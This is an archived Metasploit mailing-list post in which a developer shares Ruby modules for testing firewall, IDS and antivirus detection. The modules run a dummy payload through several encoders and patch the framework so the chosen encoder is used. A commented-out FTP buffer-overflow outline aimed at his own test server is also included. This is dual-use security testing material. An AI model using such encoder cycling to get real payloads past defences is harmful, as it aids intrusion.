Metasploit mailing list archives
Firewall/IDS/AV Stress Tester
From: vmukhi at vsnl.com (vmukhi at vsnl.com)
Date: Wed, 11 Jan 2006 21:10:51 +0500
I am using the Metasploit Framework to write a Firewall/IDS/Anti Virus Stress testing product. Too many people I meet are convinced that if they use the above products, there networks are safe from intruders. Thus I wanted a product that will take a exploit and encode it with different encoders to see which signatures are caught by the Firewall/IDS/AV. I read an e-mail on this list that said that we even though we were allowed to specify an encoder the framework finally decided. I made the folllowing in the source code to achieve my objective. Am i doing the right thing. The code follows vijay20.rb require 'msf/core' module Msf class Exploits::Vijay20 < Msf::Exploit::Remote include Exploit::Remote::Ftp def initialize() info1 = { 'Targets' => [['Windows Universal', {'Platform' => 'win' , 'Ret' => 0x13 } ],] , 'Payload' => { #'Encoder' => 'x86/jmp_call_additive', #'Encoder' => 'x86/call4_dword_xor', #'Encoder' => 'x86/fnstenv_mov', #'Space' => 100, 'BadChars' => "\x90" , }, 'DefaultTarget' => 0 } super(info1) end def exploit payload.raw.each_byte {|x| printf("%x ", x)} printf("\n"); payload.encoded.each_byte {|x| printf("%x ", x)} printf("\n"); #connect #buf = "AAAAAAA" + "\x88\xff\x12\x00" #buf = buf + payload.raw #send_cmd (["USER",buf], false) #disconnect end # end exploit end # end class end # end module I have written a simple ftp server in C under windows with a buffer overflow. The exploit vijay20.rb first displays both the raw and encoded payloads and the rest of the code that connects to the server and serves the exploit is commented out.The above file is in the modules/exloits folder. mukhi4.rb require 'msf/core' module Msf module Payloads module Singles module Windows module Mukhi4 include Msf::Payload::Windows include Msf::Payload::Single def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Execute Command', 'Version' => '$Revision: 1.4 $', 'Description' => 'Execute an arbitrary command', 'Author' => 'vlad902', 'Platform' => 'win', 'Arch' => ARCH_X86, 'Payload' => { 'Payload' => "\x90\xcc" } )) end def generate return super + "\x00" end end end end end end Payload mukhi4.rb is a simple copy on an existing payload and returns only 90 and cc. This file is placed in the payloads/singles/windows folder. manish.rb require 'msf/base' framework = Msf::Simple::Framework.create input = Rex::Ui::Text::Input::Stdio.new output = Rex::Ui::Text::Output::Stdio.new driver = Msf::ExploitDriver.new(framework) driver.exploit = framework.exploits.create('vijay20') driver.payload = framework.payloads.create('windows/mukhi4' ) driver.exploit.datastore.import_options_from_s('Encoder=x86/jmp_call_additive') driver.payload.share_datastore(driver.exploit.datastore) driver.target_idx = 0; driver.exploit.init_ui(input , output) driver.payload.init_ui(input , output) driver.run driver.exploit.datastore.import_options_from_s('Encoder=x86/call4_dword_xor') driver.payload.share_datastore(driver.exploit.datastore) driver.run driver.exploit.datastore.import_options_from_s('Encoder=x86/fnstenv_mov') driver.payload.share_datastore(driver.exploit.datastore) driver.run A program that we will run as ruby -Ilib manish.rb Output 90 cc 0 fc bb e7 4b 69 63 eb c 5e 56 31 1e ad 1 c3 85 c0 75 f7 c3 e8 ef ff ff ff 77 87 69 63 77 18 6a 63 90 cc 0 33 c9 83 e9 ff e8 ff ff ff ff c0 5e 81 76 e b 66 1 c5 83 ee fc e2 f4 9b aa 1 c5 90 cc 0 6a 1 59 d9 ee d9 74 24 f4 5b 81 73 13 2e 5e 2c 6a 83 eb fc e2 f4 be 92 2c 6a In this progarm copied from the samples, we call running the same exploit vijay20 and payload mukhi4 with different encoders and henc the output is different. To achieve this we made the following changes in the file encoded_payload.rb found in folder lib/msf/core encoded_payload.rb #our code if ( pinst.datastore['Encoder'] ) preferred = framework.encoders[ pinst.datastore['Encoder'] ] encoders.unshift([pinst.datastore['Encoder'], preferred ]) end #their code encoders.each { |encname, encmod| self.encoder = encmod.new self.encoded = nil We simply copied some code written earlier so that the variables we set place our encoder first in the array and thus we can decide the encoder used. Is this the right way to write a stress test product. We have a site wwww.vijaymukhi.com where you see that I have used a zillion products and languages in the past. From all of them yours Metasploit Framework is not the best but by far the best framework I have ever used in my life. I believe that your product will change the way we write exploits and security tools. I have even learnt Ruby and written over 250 pages on it. You may not realize what a great service you have done people like me who teach OS internals. Some of the tools I plan now writing could not have been possible without your framework. An open offer, if any developer from your team comes to Mumbai/Bombay India please be my guest. You will be doing me a favour. My way of saying thank you for the great framework that you have build. Vijay Mukhi
Current thread:
- Firewall/IDS/AV Stress Tester vmukhi at vsnl.com (Jan 11)
- Firewall/IDS/AV Stress Tester mmiller at hick.org (Jan 11)